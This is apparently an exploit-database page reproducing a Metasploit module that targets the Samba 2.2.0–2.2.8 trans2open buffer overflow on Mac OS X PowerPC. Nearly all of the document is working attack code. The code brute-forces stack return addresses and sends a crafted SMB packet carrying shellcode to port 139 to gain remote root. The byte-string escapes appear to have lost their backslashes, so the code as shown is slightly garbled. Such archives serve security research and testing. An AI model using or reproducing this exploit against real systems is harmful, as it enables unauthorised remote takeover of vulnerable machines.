[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Samba 2.2.0 - 2.2.8 trans2open Overflow (OS X)
# Published : 2003-04-07
# Author : H D Moore
# Previous Title : Samba 2.2.x Remote Root Buffer Overflow Exploit
# Next Title : Samba 2.2.x nttrans Overflow
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba trans2open Overflow (Mac OS X)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the bug on Mac OS X PowerPC systems.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2003-0201'],
[ 'OSVDB', '4469'],
[ 'BID', '7294'],
[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "x00",
'MinNops' => 512,
},
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Targets' =>
[
['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],
],
'DisclosureDate' => 'Apr 7 2003',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(139)
], self.class)
end
# Need to perform target detection
def autofilter
false
end
def exploit
curr_ret = target['Rets'][0]
while (curr_ret >= target['Rets'][1])
break if session_created?
begin
print_status("Trying return address 0x%.8x..." % curr_ret)
connect
smb_login
# 1988 is required for findrecv shellcode
pattern = rand_text_english(1988)
# This stream covers the framepointer and the return address
pattern[1195, 64] = [curr_ret].pack('N') * 16
# Stuff the shellcode into the request
pattern[3, payload.encoded.length] = payload.encoded
trans =
"x00x04x08x20xffx53x4dx42x32x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00"+
"x64x00x00x00x00xd0x07x0cx00xd0x07x0cx00x00x00x00"+
"x00x00x00x00x00x00x00xd0x07x43x00x0cx00x14x08x01"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x90"+
pattern
sock.put(trans)
handler
disconnect
rescue EOFError
rescue => e
print_status("Caught exception: #{e}")
break
end
curr_ret -= target['Rets'][2]
end
end
end